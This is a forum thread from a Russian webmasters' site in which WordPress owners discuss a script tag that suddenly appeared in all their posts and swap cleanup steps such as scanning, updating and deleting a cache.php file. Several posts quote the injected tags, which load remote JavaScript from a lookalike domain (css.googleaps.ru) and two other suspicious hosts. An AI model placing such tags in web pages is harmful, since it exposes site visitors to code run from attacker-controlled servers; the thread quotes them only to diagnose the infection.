WEBLEDI.RUВебледи Форум успешных женщин-вебмастеров
26 Май 2017, 16:25:43 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.

Войти
Правила Реклама
 
5
10
15
Свежие ответы
от ladyclick.ru (Реклама и доход)
от Yula (Контент, копирайтинг, переводы)
от vsemaykiadmin (CPA-сети)
от Shrem (Раскрутка сайтов в поисковиках)
от KeyAssort (Сервисы и SEO программы)
от lx19912411 (Платное размещение статей и ссылок)
от Kludge (Работа и услуги)
от PeterS (Особенности работы с разными CMS)
от HostiMan (Хостинг)
от vkoksmm1 (SMM для сайта)
от Athina (Продвижение, SEO)
от SvetikUA (Сайты)
от Loria (Google AdSENSE)
от fler (Дизайн)
от polyakovka (Новичку)
Свежие темы
Показать ещё
  Печать  
Страниц: 1 2
Автор

Тема: Во всех текстах появился какой-то скрипт  (Прочитано 6147 раз)

0 Пользователей и 1 Гость смотрят эту тему.
Миловица
Offline Offline

Пол: Женский
Сообщений: 11



Просмотр профиля
« : 26 Август 2015, 01:18:28 »

Всем доброго времени суток!
Возник вопрос, может кто подскажет... сегодня во всех записях нашла какой-то скрипт. А именно вот такой  <script src="//css.googleaps.ru/css?f=Open+Sans&amp;cd=mb&amp;ver=4.2.2"></script>
Удалила из половины, завтра удалю из оставшихся записях, но похоже это не выход. Да и вобщее я даже не знаю что это такое и откуда взялось. ( Подскажите, что предпринять, куда или к кому обратиться...
« Последнее редактирование: 14 Май 2016, 02:23:26 от w2 » Записан

Ваш сайт сможет  неплохо заработать.
dileta10
Не шалю, никого не трогаю...
Offline Offline

Пол: Женский
Сообщений: 984


Я - Лена. Нужно на "Ты".


Просмотр профиля
« Ответ #1 : 26 Август 2015, 03:47:23 »

Похоже, что Вас взломали. Удаление из записей не поможет. Нужно искать скрипт php, который создаёт их. Попробуйте пройтись айболитом от revisium.com.
Записан

neonix
Offline Offline

Сообщений: 53


Просмотр профиля
« Ответ #2 : 26 Август 2015, 06:51:11 »

ver=4.2.2
как вариант, это версия Вашего движка, хотя может быть и скрипта, если погуглить строчку скрипта, то у многих есть такие проблемы, особенно для вордпресса. Тем более, что появится она могла в 4.2.2, движок обновлен, а в базе осталось. если это так - обновляться с бекапом (т.к. прыжок через несколько ветвей любого движка чреват сам по себе) в любом случае. Так же этот скрипт добавили в плагины безопасности _https://wordpress.org/support/topic/spam-problem-5
если посмотреть тут _http://www.maultalk.com/topic188719.html?pid=1948263&mode=threaded&start= то, у человека там еще как бонусные идут
Код:
<script src="//css.googleaps.ru/css?f=Open+Sans&amp;cd=mb&amp;ver=4.2.2" type="text/javascript"></script>
<script type="text/javascript" src="//uptoliked.ru/widjets.js"></script>
<script type="text/javascript" src="//shareup.ru/social.js"></script
так что я бы поискал и другие.
хм, в гугле в некоторых местах тоже есть сведения о uptoliked, можно ли говорить о явной связи между вашим скриптом и ним - я не знаю. Сервер по вашему скрипту не дает доступа, но в заголовках есть намек, что это вряд ли сервер порядочного плагина или компании. Возможно, там либо по айпи идет определение, или еще как, или он просто в дауне. просмотреть вы можете, например, через консоль отладки браузера - Web Inspector, Firebug, Opera Dragonfly и т.п., смотря какой браузер у вас, делает ли скрипт что-то на вашем сайте.
« Последнее редактирование: 26 Август 2015, 06:55:42 от neonix » Записан
Миловица
Offline Offline

Пол: Женский
Сообщений: 11



Просмотр профиля
« Ответ #3 : 26 Август 2015, 11:24:10 »

dileta10 спасибо! закажу проверку у хостинга, сама смотрела, ничего не понимаю.
 
Сайту хоть и год уже, но там всего 40 статей, а тут решила взяться за него. Установила вчера плагин безопасности WP Security. А потом решила статьи подкорректировать и вот во всех обнаружила этот скрипт.  Плачущий

Сейчас у меня версия WordPress 4.1.7, но обновлю до 4.3 
А вообще иногда я не успеваю обновить, вордпресс сам обновляется... вот тоже проблема, как отключить это автоматическое обновление.

Так же на сайте установлены кнопки uptoliked, заменю на что-нить другое на время... а вообще в голове такая каша!  В замешательстве
Записан

Ваш сайт сможет  неплохо заработать.
yasina
Offline Offline

Пол: Женский
Сообщений: 1545



Просмотр профиля
« Ответ #4 : 26 Август 2015, 12:44:46 »

Это дыра в движке - https://toster.ru/q/230165
« Последнее редактирование: 14 Май 2016, 02:21:42 от w2 » Записан
Миловица
Offline Offline

Пол: Женский
Сообщений: 11



Просмотр профиля
« Ответ #5 : 26 Август 2015, 12:52:58 »

да, я читала этот пост
вообщем, обновила вордпресс, сменила кнопки, почистила все статьи и заказала проверку айболитом у хостинга, буду ждать результат и наблюдать дальше.  Грустный
Записан

Ваш сайт сможет  неплохо заработать.
Anasta Sia
Offline Offline

Сообщений: 10



Просмотр профиля
« Ответ #6 : 30 Август 2015, 03:29:05 »

Миловицакак у Вас обстоят дела? И у меня та же проблема((что с этим делать Грустный
Записан
Миловица
Offline Offline

Пол: Женский
Сообщений: 11



Просмотр профиля
« Ответ #7 : 30 Август 2015, 03:37:54 »

Я все почистила, гоняла базу данных сто раз антивирусником, удалила файл cache.php на хостинге и пока ничего больше не появляется, но не факт. Вот здесь тоже об этом писали

Записан

Ваш сайт сможет  неплохо заработать.
Anasta Sia
Offline Offline

Сообщений: 10



Просмотр профиля
« Ответ #8 : 30 Август 2015, 12:36:30 »

Миловица, спасибо большое. Тоже ночью всё почистила и нашла этот лишний файл в папке (удалила). На утро ничего нет) Благодарю Вас за ответ, а то я уж совсем испугалась. строим глазки
Записан
Миловица
Offline Offline

Пол: Женский
Сообщений: 11



Просмотр профиля
« Ответ #9 : 30 Август 2015, 13:13:59 »

Anasta Sia через неделю проверьте еще раз, если не появится вновь, то значит нормально, так как он может появится там же, где и был.
Записан

Ваш сайт сможет  неплохо заработать.
Annin
Нет ничего такого, на что нельзя было бы надеяться
Offline Offline

Пол: Женский
Сообщений: 2340



Просмотр профиля
« Ответ #10 : 30 Август 2015, 21:39:28 »

У меня та же проблема. Хостинг таймвеб, на всех сайтах этого акка. Наутро после чистки и не появится))) оно через сутки проявляется заново. На 3 сайтах нашла этот кеш-файлик в папке с картинками, на 2 сайтах файла этого нет, но это не помешало сайтам заразится. Так что, может дело и не в нем.
Записан


neonix
Offline Offline

Сообщений: 53


Просмотр профиля
« Ответ #11 : 31 Август 2015, 11:43:14 »

а у кого нибудь остался это файл? в бекапе или просто сохраненный. Любопытно было бы взглянуть. Хотя есть вероятность, конечно, что там может быть пароль и т.п. личные данные. С другой стороны, если скрипт получил доступ к файловой системе, то достаточно бесполезно там уже эти данные хранить.
« Последнее редактирование: 31 Август 2015, 11:44:45 от neonix » Записан
Миловица
Offline Offline

Пол: Женский
Сообщений: 11



Просмотр профиля
« Ответ #12 : 31 Август 2015, 12:02:24 »

а у кого нибудь остался это файл?
У меня нет, если проблема возобновится и я его вновь найду, напишу вам.
вчера проверяла сайты, тьфу-тьфу пока, но не факт... у моей подруги эта зараза опять появилась, не смотря на то, что она файл удаляла.
Записан

Ваш сайт сможет  неплохо заработать.
Anasta Sia
Offline Offline

Сообщений: 10



Просмотр профиля
« Ответ #13 : 31 Август 2015, 12:41:36 »

 Забыла упомянуть, что как раз перед возникновением данной проблемы устанавливала плагин Hyper Cache и тестила его. После зачистки статей от кода он был удалён как и файл в папке content. Пострадавшие этим плагином случайно не пользовались? Может, что то с ним связано...Миловица, там и проверять не нужно - сразу заметила, что сайт (а точнее, заражённые посты) загружается только через пять секунд((
Записан
Миловица
Offline Offline

Пол: Женский
Сообщений: 11



Просмотр профиля
« Ответ #14 : 31 Август 2015, 13:01:00 »

У меня не стоит плагин кэширования.
Записан

Ваш сайт сможет  неплохо заработать.
Страниц: 1 2
  Печать  
 
Перейти в:  

| Sitemap